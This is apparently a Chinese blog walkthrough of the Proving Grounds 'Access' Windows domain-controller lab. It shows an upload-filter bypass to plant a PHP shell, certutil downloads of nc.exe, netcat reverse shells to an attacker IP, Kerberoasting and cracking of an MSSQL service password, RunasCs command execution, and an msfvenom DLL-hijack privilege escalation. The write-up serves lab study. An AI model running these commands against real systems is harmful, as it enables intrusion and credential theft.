Access pg walkthrough Intermediate window域渗透

namp 
nmap -p- -A -sS -T4 192.168.200.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 00:24 UTC
Stats: 0:02:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.45% done; ETC: 00:26 (0:00:00 remaining)
Nmap scan report for 192.168.200.187
Host is up (0.071s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Access The Event
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-23 00:26:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49738/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 4 hops
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-23T00:26:57
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   70.57 ms 192.168.45.1
2   70.55 ms 192.168.45.254
3   71.24 ms 192.168.251.1
4   71.36 ms 192.168.200.187

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.49 seconds

观察端口开放情况 发现53 和 88两个端口都开着 可以确认是一台域控服务器

访问80端口
image
扫描网站
发现forms 目录
image
uploads目录
image
尝试给他发送邮件 发现报错 Error: Unable to load the "PHP Email Form" Library!
image

还发现一个测试点
image
他存在文件扩展名检测
我们抓包 将shell.php 改成shell.php:.jpg 上传实现绕过
image
发现我们上传成功 但是内容为0kb
image
我们要进行追加操作
image
发现成功
image
那么接下来尝试反弹shell
certutil -urlcache -split -f http://192.168.45.250/nc.exe nc.exe 下载nc.exe
nc -e cmd 192.168.45.250 80反弹shell
image

进入提权环节

继续搜集一下信息
ldap协议发现没啥东西
image

然后就不太会了
看wp

先用这个脚本 获取域环境下的所有spn
https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1?source=post_page-----b95d3146cfe9--------------------------------
image
发现了mssql的spn

指定请求该spn的tgs
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

将tgs导出
wp用的是这个脚本
https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1?source=post_page-----b95d3146cfe9--------------------------------
这个命令.\Invoke-Kerberoast.ps1
但我发现我运行之后没反应

经过搜索我发现一个这样用
import-module ./Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat | fl
哈希出来了
image

那么接下来我们要做的就是爆破哈希值 得到mssql这个账户的密码
john st --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt
爆破成功 trustno1
image
尝试拿shell evil-winrm -u svc_mssql -p trustno1 -i 192.168.200.187
image
发现报错
再试另一个
impacket-wmiexec access/svc_mssql:trustno1@192.168.200.187
image
tmd 也不行 服了

不拿shell了 看看有无共享文件
crackmapexec smb 192.168.200.187 -u svc_mssql -d access.offsec -p "trustno1" --shares

再上传一个脚本
import-module .\Invoke-RunasCs.ps1导入脚本
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami" 执行命令 这个类似于sudo
image
执行成功

执行反弹shll
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\xampp\htdocs\uploads\nc.exe -e cmd 192.168.45.250 135"
反弹成功
image
终于拿到第一个flag了
image

发现SeChangeNotifyPrivilege 权限 可以提权
image
用这个
https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public?source=post_page-----b95d3146cfe9--------------------------------
现在我们再c盘有可写权限
image

现在我们用dll劫持来进行提权

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll

靶机上执行
certutil -urlcache -split -f "http://192.168.45.250:88/tzres.dll" C:\Windows\System32\wbem\tzres.dll
再执行systeminfo
发现我失败了 没反应
但是wp成功了
不知道除了啥问题 估计是靶场有些小问题
理论上到这一步就提权成功了

posted @   WSssSW  阅读(25)  评论(0编辑  收藏  举报
相关博文:
· Shenzi pg walkthrough Intermediate window
· AuthBy pg walkthrough Intermediate window
· pWnOS2
· vulnhub靶机:hotelWW
· pWnOS1
阅读排行:
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!
点击右上角即可分享
微信分享提示